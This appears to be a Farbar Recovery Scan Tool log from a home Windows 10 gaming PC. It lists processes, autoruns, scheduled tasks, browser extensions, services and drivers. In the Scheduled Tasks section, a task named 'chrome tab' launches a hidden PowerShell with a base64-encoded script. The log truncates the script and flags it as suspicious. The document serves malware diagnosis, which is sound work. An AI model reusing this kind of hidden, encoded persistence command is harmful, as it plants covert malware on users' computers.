Running from C:\Users\Miggy\Downloads
Loaded Profiles: Miggy
Platform: Microsoft Windows 10 Home Version 21H2 19044.1826 (X64) Language: English (United States)
Default browser: Chrome
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe ->) (Adobe Inc. -> ) C:\Program Files (x86)\Adobe\Adobe Sync\CoreSync\CoreSync.exe
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud Helper.exe <2>
(C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\Adobe Installer.exe
(C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe <2>
(C:\Program Files (x86)\ONN\onn.exe ->) () [File not signed] C:\Program Files (x86)\ONN\KbDaemon.exe
(C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7>
(C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe ->) (OpenJS Foundation -> Node.js) C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe <2>
(C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe ->) (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\CCLibrary.exe
(C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\CCLibrary.exe ->) (OpenJS Foundation -> Node.js) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\libs\node.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCopyAccelerator.exe
(C:\Riot Games\Riot Client\RiotClientServices.exe ->) () [File not signed] C:\Riot Games\Riot Client\RiotClientCrashHandler.exe
(C:\Riot Games\Riot Client\RiotClientServices.exe ->) (Riot Games, Inc. -> Riot Games) C:\Riot Games\VALORANT\live\VALORANT.exe
(C:\Riot Games\VALORANT\live\ShooterGame\Binaries\Win64\VALORANT-Win64-Shipping.exe ->) (Riot Games, Inc. -> Epic Games, Inc.) C:\Riot Games\VALORANT\live\Engine\Binaries\Win64\UnrealCEFSubProcess.exe
(C:\Riot Games\VALORANT\live\VALORANT.exe ->) (Riot Games, Inc. -> CN) C:\Riot Games\VALORANT\live\ShooterGame\Binaries\Win64\VALORANT-Win64-Shipping.exe
(cmd.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Discord Inc. -> Discord Inc.) C:\Users\Miggy\AppData\Local\Discord\app-1.0.9005\Discord.exe <6>
(explorer.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(explorer.exe ->) (Globalhop Ltd -> ) C:\Users\Miggy\AppData\Local\Programs\RestMinder\RestMinder.exe
(explorer.exe ->) (Mega Limited -> Mega Limited) C:\Users\Miggy\AppData\Local\MEGAsync\MEGAsync.exe
(explorer.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingApp_2207.1001.5.0_x64__8wekyb3d8bbwe\XboxAppServices.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgtray.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Riot Games\Riot Client\RiotClientServices.exe
(explorer.exe ->) (Shenzhen Evision Semiconductor Technology Co., Ltd -> ) C:\Program Files (x86)\ONN\onn.exe
(explorer.exe ->) (Spotify AB -> Spotify Ltd) C:\Users\Miggy\AppData\Roaming\Spotify\Spotify.exe <6>
(explorer.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe
(Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.30001.0_x64__8wekyb3d8bbwe\gamingservices.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.30001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\NisSrv.exe
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe <2>
(services.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgc.exe
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(services.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe
(svchost.exe ->) (Adobe Systems Incorporated) C:\Program Files\WindowsApps\AdobeNotificationClient_3.0.1.1_x86__enpm4xejd91yc\AdobeNotificationClient.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_11.2205.23.0_x64__8wekyb3d8bbwe\Time.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\GameBarPresenceWriter.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MoUsoCoreWorker.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\RtkAudUService64.exe [856288 2019-10-29] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3071232 2022-06-29] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3427104 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [129288 2021-08-04] (Adobe Inc. -> )
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [850208 2022-05-12] (Adobe Inc. -> Adobe Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Discord] => C:\Users\Miggy\AppData\Local\Discord\Update.exe [1512760 2020-12-03] (Discord Inc. -> GitHub)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32699856 2022-07-14] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4282328 2022-06-06] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [com.blitz.app] => C:\Users\Miggy\AppData\Local\Programs\Blitz\Blitz.exe --autostart (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Spotify] => C:\Users\Miggy\AppData\Roaming\Spotify\Spotify.exe [19970464 2022-07-08] (Spotify AB -> Spotify Ltd)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [NZXT.CAM] => C:\Program Files\NZXT CAM\NZXT CAM.exe --startup (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [RestMinder] => C:\Users\Miggy\AppData\Local\Programs\RestMinder\RestMinder.exe [199232 2021-09-06] (Globalhop Ltd -> )
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Medal] => C:\Users\Miggy\AppData\Local\Medal\update.exe [1901144 2022-01-09] (Ferox Games B.V. -> )
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Energy] => C:\Users\Miggy\AppData\Roaming\Energy\Energy.exe --fTZuKpU (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3148016 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [ONN.] => C:\Program Files (x86)\ONN.\onn.exe [4436120 2021-11-14] (Shenzhen Evision Semiconductor Technology Co., Ltd -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\103.0.5060.114\Installer\chrmstp.exe [2022-07-04] (Google LLC -> Google LLC)
Startup: C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMVU.lnk [2021-10-17]
ShortcutTarget: IMVU.lnk -> C:\Users\Miggy\AppData\Roaming\IMVUClient\IMVUQualityAgent.exe (No File)
Startup: C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2022-06-05]
ShortcutTarget: MEGAsync.lnk -> C:\Users\Miggy\AppData\Local\MEGAsync\MEGAsync.exe (Mega Limited -> Mega Limited)
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0EC66224-E7F9-4896-AC22-604F9481BFD0} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-2826498334-1472090739-1589450912-1002 => C:\Users\Miggy\AppData\Local\MEGAsync\MEGAupdater.exe [2531504 2022-06-23] (Mega Limited -> )
Task: {186D8709-E02A-4B19-ABAC-627A0E438748} - System32\Tasks\Opera GX scheduled Autoupdate 1643160997 => C:\Users\Miggy\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0) (No File)
Task: {19056965-D8E2-42BA-9198-BA321F141CBC} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {1D22A23D-A8AC-4920-9D07-A55F94E7D9EF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {252A9582-5B4F-4191-9010-B1BB0DFF8B00} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {2C3DB3C3-1853-4F46-9049-ADE90B75A3FA} - System32\Tasks\chrome tab => cmd /c powershell -WindowStyle Hidden -E "CgAKAAoAJABqAGQAIAA9ACAAJABuAHUAbABsADsACgAKACQAZQBuAGMAUwB0AHIAQQBzAGMAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAOwAKACQAagBwAD0AJABuAHUAbABsADsACgAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAVgBhAGwAdQBlAE4AZQB3ACgAWwBzAHQAcgBpAG (the data entry has 4955 more characters). <==== ATTENTION
Task: {316B07D7-B842-4CA6-9143-E47A44373CE9} - System32\Tasks\Mozilla\Firefox Background Update 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\firefox.exe --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask backgroundupdate
Task: {34FBA49C-DB6E-466D-9949-8BA989A2D755} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {34FF53DA-910C-48FF-A27B-6C77610DC964} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1003128 2022-03-01] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {35A6F66D-DC69-4521-8F02-D46FEAA910DC} - System32\Tasks\Microsoft\Windows\CUAssistant\CULauncher => C:\Program Files\CUAssistant\culauncher.exe (No File)
Task: {3A4DAEC6-DB69-41C4-B1CD-2D21D21DAF48} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [52104 2017-04-24] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {592A03EA-5CC2-4DCE-8D23-D389B778676B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7837ED71-57CE-4F2F-9588-701188B7FA26} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3427104 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {8B92C189-E256-455B-B83D-BB9EA201CEC2} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3342080 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {967C49C7-7365-496B-84CC-F943F6485839} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9B6AA54B-A7A6-44EE-B7FB-7023090FBCC6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {B22F7ED0-E54D-4755-BF66-7C277C4F783F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-07-31] (Google LLC -> Google LLC)
Task: {C52D7066-5B3F-408A-AF5C-CCC3BD7E9982} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [646344 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {D1EBC865-4929-4089-875B-C0F67EC2595B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-07-31] (Google LLC -> Google LLC)
Task: {DAF682D5-38DA-494C-96CE-78534D6E588E} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {EACF08E7-F007-4892-8304-796E244D2C74} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {F0E4183A-6ABA-4A9B-B752-1347AA639C62} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {FC1BCD53-BD5F-46F6-B451-6482CD8B026A} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{37bbd38f-8acb-4c40-b864-ada8bb32978f}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{414f2442-2e8a-4d1e-a13b-9d87f203ed03}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{5c61890f-5044-4e9c-8570-a54ea7f72db7}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{c27cbc7d-a6d2-4954-a213-802ef8bff43d}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{f885ed82-1422-4cda-906b-0d4ab502143f}: [DhcpNameServer] 192.168.254.254
Edge:
=======
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
Edge DefaultProfile: Default
Edge Profile: C:\Users\Miggy\AppData\Local\Microsoft\Edge\User Data\Default [2022-04-28]
FireFox:
========
FF DefaultProfile: 3lkpfjap.default
FF ProfilePath: C:\Users\Miggy\AppData\Roaming\Mozilla\Firefox\Profiles\3lkpfjap.default [2021-07-09]
FF ProfilePath: C:\Users\Miggy\AppData\Roaming\Mozilla\Firefox\Profiles\wmxmjnvg.default-release [2022-07-15]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2022-05-12] (Adobe Inc. -> Adobe Systems)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2022-05-12] (Adobe Inc. -> Adobe Systems)
Chrome:
=======
CHR Profile: C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default [2022-07-16]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2022-07-05]
CHR Extension: (Adblock for Youtube™) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmedhionkhpnakcndndgjdbohmhepckk [2022-07-11]
CHR Extension: (Google Docs Offline) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-06-14]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Profile: C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\System Profile [2020-07-31]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [919328 2022-04-18] (Adobe Inc. -> Adobe Inc.)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3815712 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3580200 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
R3 EABackgroundService; C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe [11152008 2022-07-14] (Electronic Arts, Inc. -> Electronic Arts)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [811496 2022-06-21] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [553264 2020-12-28] (EasyAntiCheat Oy -> Epic Games, Inc.)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029456 2022-07-14] (Epic Games Inc. -> Epic Games, Inc.)
S3 EQU8_19; C:\ProgramData\EQU8\Totally Accurate Battlegrounds\bin\anticheat.x64.equ8.exe [6221456 2021-10-02] (Int3 Software AB -> Int3 Software AB)
S3 EQU8_4; C:\ProgramData\EQU8\AimLab\bin\anticheat.x64.equ8.exe [8468624 2021-12-18] (Int3 Software AB -> Int3 Software AB)
S2 GameInput Service; C:\Program Files (x86)\Microsoft GameInput\x64\gameinputsvc.exe [75240 2022-05-25] (Microsoft Corporation -> Microsoft Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2575624 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3494672 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13086224 2020-07-20] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R3 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10452496 2022-06-29] (Riot Games, Inc. -> Riot Games, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\NisSrv.exe [3120992 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe [133544 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 zksvc; C:\Program Files\Common Files\PUBG\zksvc.exe [8737992 2022-01-23] (PUBG CORPORATION -> PUBG Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [File not signed]
S3 EQU8_HELPER_19; C:\WINDOWS\system32\DRIVERS\EQU8_HELPER_19.sys [38032 2021-10-08] (Int3 Software AB -> )
S3 gdrv; C:\Windows\gdrv.sys [25640 2020-07-01] (Giga-Byte Technology -> Windows ® Server 2003 DDK provider)
R3 HHTHid; C:\WINDOWS\System32\drivers\HHTHid.sys [24784 2019-10-10] (Shenzhen Evision Semiconductor Technology Co.,Ltd. -> 0)
R3 HHTHid_ArtvhMouFiltr; C:\WINDOWS\System32\drivers\HHTHidMouFiltr.sys [23896 2019-10-10] (Shenzhen Evision Semiconductor Technology Co.,Ltd. -> 0)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48552 2021-10-31] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation)
S3 VCamSDK; C:\WINDOWS\system32\DRIVERS\VCamSDK.sys [1090904 2019-12-22] (Shanghai Yitu Information Technology Co.,Ltd. -> e2eSoft)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [8607648 2022-06-29] (Riot Games, Inc. -> Riot Games, Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [49576 2022-06-22] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
